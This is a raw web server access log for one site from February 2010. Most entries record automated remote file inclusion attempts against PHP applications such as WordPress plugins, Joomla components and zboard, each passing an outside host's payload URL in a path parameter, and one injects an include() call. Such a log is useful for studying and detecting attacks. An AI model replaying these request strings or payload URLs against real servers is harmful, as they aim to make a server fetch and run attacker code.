125.141.91.138 - - [12/Feb/2010:04:00:20 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [12/Feb/2010:04:00:35 -0800] "GET /logs//good.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [12/Feb/2010:04:00:35 -0800] "GET /good.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [12/Feb/2010:04:00:35 -0800] "GET /logs/access_100202.log%20%20//good.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:01:40 -0800] "GET /logs/access_100202.log//good.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:01:40 -0800] "GET /good.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:01:45 -0800] "GET /logs//good.php?board_skin_path=http://www.bio2.pe.kr/bbs/imgs/yes.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:02:00 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.31.2.114 - - [12/Feb/2010:04:02:06 -0800] "GET /errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.31.2.114 - - [12/Feb/2010:04:02:06 -0800] "GET /logs/access_100118.log//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.31.2.114 - - [12/Feb/2010:04:02:06 -0800] "GET /logs//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.31.2.114 - - [12/Feb/2010:04:02:06 -0800] "GET /logs/access_100111.log//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:02:43 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:04:04 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:04:05 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:04:26 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:05:18 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:05:18 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:05:43 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:06:02 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.172.33.230 - - [12/Feb/2010:04:06:15 -0800] "GET /logs/access_100202.log//good.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:06:41 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:07:32 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:04:08:20 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:08:53 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:08:53 -0800] "GET /logs/access_100201.log%20%20/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:08:53 -0800] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:10:00 -0800] "GET /logs/access_100103.log%20%20/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:04:10:07 -0800] "GET /zboard/skin/happycast/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:04:10:07 -0800] "GET /logs/access_100117.log%20%20//zboard/skin/happycast/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:04:10:07 -0800] "GET /logs//zboard/skin/happycast/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:10:53 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:10:53 -0800] "GET /logs/access_100118.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:10:53 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:10:53 -0800] "GET /logs/access_100118.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:10:53 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:10:53 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:04:11:39 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:04:11:40 -0800] "GET /orange_g/forum/viewtopic.php?p=26136 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:04:11:48 -0800] "GET /orange_g/forum/viewtopic.php?p=27049 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
67.222.129.18 - - [12/Feb/2010:04:12:05 -0800] "GET /logs/access_100204.log%20%20/administrator/components/com_virtuemart/Tar.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [12/Feb/2010:04:12:13 -0800] "GET /good.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [12/Feb/2010:04:12:13 -0800] "GET /logs/access_100202.log//good.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [12/Feb/2010:04:12:14 -0800] "GET /logs//good.php?board_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.31.2.114 - - [12/Feb/2010:04:13:22 -0800] "GET /logs/access_100111.log%20//errors.php?error=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:04:13:39 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:04:13:40 -0800] "GET /orange_g/forum/viewtopic.php?p=25384 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
210.117.228.70 - - [12/Feb/2010:04:14:42 -0800] "GET /logs/access_100117.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:14:48 -0800] "GET /logs/access_100117.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:15:00 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:15:00 -0800] "GET /logs/access_100201.log/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:15:00 -0800] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:04:21:25 -0800] "GET /logs/access_100121.log/////appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:04:21:25 -0800] "GET ////appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:04:21:25 -0800] "GET /logs/////appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:04:21:31 -0800] "GET /logs/access_100121.log/////appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:04:21:31 -0800] "GET ////appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:04:21:31 -0800] "GET /logs/////appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [12/Feb/2010:04:22:14 -0800] "GET /logs/access_100111.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [12/Feb/2010:04:22:14 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [12/Feb/2010:04:22:15 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:04:23:08 -0800] "GET /logs/access_100107.log/////appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [12/Feb/2010:04:23:21 -0800] "GET /logs/access_100107.log/////appserv/main.php?appserv_root=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [12/Feb/2010:04:24:55 -0800] "GET /logs/access_100109.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
187.45.193.155 - - [12/Feb/2010:04:25:47 -0800] "GET /logs/index.php?lg=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
187.45.193.155 - - [12/Feb/2010:04:25:47 -0800] "GET /logs/access_100109.log/index.php?lg=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
187.45.193.155 - - [12/Feb/2010:04:25:47 -0800] "GET /index.php?lg=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
187.45.193.155 - - [12/Feb/2010:04:26:16 -0800] "GET /logs/access_100109.log/index.php?lg=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
187.45.193.155 - - [12/Feb/2010:04:26:16 -0800] "GET /logs/index.php?lg=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
187.45.193.155 - - [12/Feb/2010:04:26:17 -0800] "GET /index.php?lg=http://www.de-port.com//administrator/components/com_virtuemart/id1autoscan.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:27:38 -0800] "GET /logs/access_100123.log%20%20//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:27:38 -0800] "GET /logs//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:27:38 -0800] "GET /logs/access_100119.log%20%20//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:27:38 -0800] "GET /index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:27:51 -0800] "GET /logs/access_100119.log%20%20//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:27:51 -0800] "GET /logs//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:27:51 -0800] "GET /logs/access_100123.log%20%20//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:27:51 -0800] "GET /index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
217.171.66.55 - - [12/Feb/2010:04:29:22 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://bipumnara.co.kr/start/data/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
217.171.66.55 - - [12/Feb/2010:04:29:22 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://bipumnara.co.kr/start/data/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:29:44 -0800] "GET /logs/access_100123.log//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:29:44 -0800] "GET /logs//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:29:44 -0800] "GET /logs/access_100119.log//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:29:44 -0800] "GET /logs/access_100123.log//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:29:44 -0800] "GET /index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:29:44 -0800] "GET /logs//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:29:44 -0800] "GET /index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [12/Feb/2010:04:29:45 -0800] "GET /logs/access_100119.log//index.php?redir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:04:31:13 -0800] "GET /zboard/skin/uks_board_v2010/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:04:31:13 -0800] "GET /logs//zboard/skin/uks_board_v2010/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:04:31:13 -0800] "GET /logs/access_100117.log%20%20//zboard/skin/uks_board_v2010/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:31:56 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:31:56 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:31:56 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:32:45 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:32:45 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.117.228.70 - - [12/Feb/2010:04:32:45 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://nba-news.net//language/english/1.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:04:32:51 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:04:32:52 -0800] "GET /orange_g/forum/viewtopic.php?p=25867 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:04:33:02 -0800] "GET /orange_g/forum/viewtopic.php?p=25934 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
221.139.0.75 - - [12/Feb/2010:04:34:08 -0800] "GET /zboard/skin/uks_gallery_v3010/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:04:34:08 -0800] "GET /logs/access_100117.log%20%20//zboard/skin/uks_gallery_v3010/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [12/Feb/2010:04:34:08 -0800] "GET /logs//zboard/skin/uks_gallery_v3010/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:35:37 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:35:37 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:35:37 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:35:57 -0800] "GET /logs/access_100104.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:36:19 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:36:19 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:36:20 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:37:44 -0800] "GET /logs/access_100131.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:37:44 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:37:45 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:37:56 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:37:56 -0800] "GET /logs/access_100131.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:37:56 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:38:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:38:00 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:38:00 -0800] "GET /logs/access_100105.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
